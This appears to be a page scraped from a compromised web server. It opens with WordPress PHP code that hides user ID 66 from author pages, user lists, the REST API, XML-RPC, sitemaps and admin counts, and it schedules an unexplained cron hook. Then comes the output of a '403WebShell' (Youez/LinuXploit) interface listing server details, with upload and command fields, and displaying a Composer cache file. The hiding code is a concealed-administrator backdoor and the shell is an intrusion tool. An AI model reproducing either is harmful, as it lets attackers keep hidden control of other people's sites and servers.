add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/packages.json
{"packages":[],"notify-batch":"https:\/\/packagist.org\/downloads\/","providers-url":"\/p\/%package%$%hash%.json","metadata-url":"\/p2\/%package%.json","metadata-changes-url":"https:\/\/packagist.org\/metadata\/changes.json","search":"https:\/\/packagist.org\/search.json?q=%query%&type=%type%","list":"https:\/\/packagist.org\/packages\/list.json","security-advisories":{"metadata":true,"api-url":"https:\/\/packagist.org\/api\/security-advisories\/"},"providers-api":"https:\/\/packagist.org\/providers\/%package%.json","warning":"Support for Composer 1 will be shutdown on August 1st 2025. You should upgrade to Composer 2. See https:\/\/blog.packagist.com\/shutting-down-packagist-org-support-for-composer-1-x\/","warning-versions":"<1.99","provider-includes":{"p\/provider-2013$%hash%.json":{"sha256":"0c9f71089812a9c15d1d5e035727a60ff413aba31569ca10500861a85cde1e78"},"p\/provider-2014$%hash%.json":{"sha256":"1a1b2531f73bd39458771b5d53bdccd188b602d2fba30eb8400e03e7a10b1f84"},"p\/provider-2015$%hash%.json":{"sha256":"dca52be934ef7e6070c2000ad2fd0e4eb340953feb5973ae7f3bc9ca0989b2b9"},"p\/provider-2016$%hash%.json":{"sha256":"49835f4411dbcef89b8336cb1b780edd7fa2aa5514266f29517e4e3ead8b79df"},"p\/provider-2017$%hash%.json":{"sha256":"a99a38183b016a24b2cf0c25d8cfb6566630303c5f6d90eabc22c83485d8a171"},"p\/provider-2018$%hash%.json":{"sha256":"ef1d9e4309493879e39d39290721f13ce0f95cce7620987fe3fbd21445eca1aa"},"p\/provider-2019$%hash%.json":{"sha256":"686aa4bb590de275e2eb3581d9b1d6ada5e4748d66aa7e2ce827964771207656"},"p\/provider-2020$%hash%.json":{"sha256":"663c12b8bf605bd07ff538c5c507125f9eb9ed25f81668ad552fb7deefd38a13"},"p\/provider-2021$%hash%.json":{"sha256":"95548c37bf39628abeb0df5ca958fca2a3ad09219d25fe602fbd8619c94de02e"},"p\/provider-2022$%hash%.json":{"sha256":"a7f2cf65e884ada62e0a66b3ef2712cc81cc64535346bf98e544ca5b5424fa75"},"p\/provider-2023$%hash%.json":{"sha256":"b5c335ac93df8d318cc04d96c30064786112b5645c3a0adc2de4e058c6bb75e3"},"p\/provider-2024-01$%hash%.json":{"sha256":"e4b37611ec5b9874854136bbabc2ed441f9d9ce78dd6b38a2fe7c3042030026d"},"p\/provider-2024-04$%hash%.json":{"sha256":"2fbe8ecce5519172cfdbe42ad9cdeb938e10231c3fd5e95faef515eaf255368a"},"p\/provider-2024-07$%hash%.json":{"sha256":"dc09190af9f70a5a6a1e45c2b84c7ae08dd06763b2bb9e88cc6dccd5e550f8e4"},"p\/provider-2024-10$%hash%.json":{"sha256":"c7d88e3fdd2db61c796639e1e6106684dfadd4e02e562b985426e5b5215f26f5"},"p\/provider-archived$%hash%.json":{"sha256":"e344bb8d5ff17559d376319cef947f1664a3d4fd745c16f6bf72afce4c7597c5"},"p\/provider-latest$%hash%.json":{"sha256":"c1c7e4be32b627f7e4522690fbb9157bb1412c8a72def66fe4391d755ab1ee41"}},"last-modified":"Sat, 23 Nov 2024 06:02:57 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit